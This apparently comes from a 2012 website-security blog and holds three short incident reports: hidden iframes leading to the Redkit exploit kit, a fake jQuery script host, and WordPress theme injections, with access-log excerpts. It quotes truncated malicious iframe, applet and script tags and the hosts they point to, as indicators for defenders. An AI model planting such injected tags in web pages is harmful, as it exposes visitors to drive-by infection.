bookmark_borderIframes to redkit exploit kit

A New batch of compromised sites are being infected with hidden iframes leading to the Redkit exploit kit. A site gets hacked and an iframe similar to this one is added::

<iframe src="http://ad-d-to.com.br.ms:81/rem2.html..

Once that is loaded into the browser, it redirects anyone visiting the site to:

http://orcasp.com.br/43745180.html

Where it tries to make the browser load some malicious PDFs or Jar files:

<applet archive="http://orcasp.com.br/33256.jar"..

<iframe src="http://orcasp.com.br/98765.pdf"..

And if you are running an outdated version of Java or Adobe PDF, your personal computer would get compromised as well.

bookmark_borderFake jquery site

Seeing many sites with a fake jquery links on them from jquery-framework.com (justregistered on 2012/08/05)::

<script src="httx://jquery-framework.com/jquery-1.7.1.js..

If you use jquery, make sure to link to reliable sources (either jquery.org or googleapis). This one is redirecting usersto http://browser-31.com/s/3013.

bookmark_borderRebots.php on WordPress

We are seeing a new batch of the rebots.php infections on WordPress and one thingis intriguing us. On many sites we are analysing, WordPress is updated and no suspiciousbackdoors or plugins were found. All in order, except for the javascript injected inside the theme.

The only thing in common on them is a single login to wp-admin, followed by a visit towp-admin/theme-editor.php to modify the theme:

184.22.164.xx - - [29/Aug/2012:21:03:02 -0300] "POST ///wp-login.php HTTP/1.1" 302 - "-" ""

184.22.164.xx - - [29/Aug/2012:21:03:13 -0300] "POST //wp-admin/theme-editor.php HTTP/1.1" 302 -
"-" ""

184.22.164.xx - - [22/Aug/2012:21:03:16 -0300] "GET //wp-admin//theme-editor.php?file=index.php&theme=classic&scrollto=0&updated=true HTTP/1.1" 200 58188 "-" ""

So it seems someone was able to steal the wp-admin password and edit the theme. It was done automatically, since no CSS or .JS files were loaded.

Another intereting issue is that on some of these sites, we didn\’t identify any brute force attack trying to guess the passwords. Just this single login.

Since we don\’t know how these passwords got stolen, we recommend people to change their wp-admin passwords asap until we have more info (specially if you have been compromised with the rebots.php injection).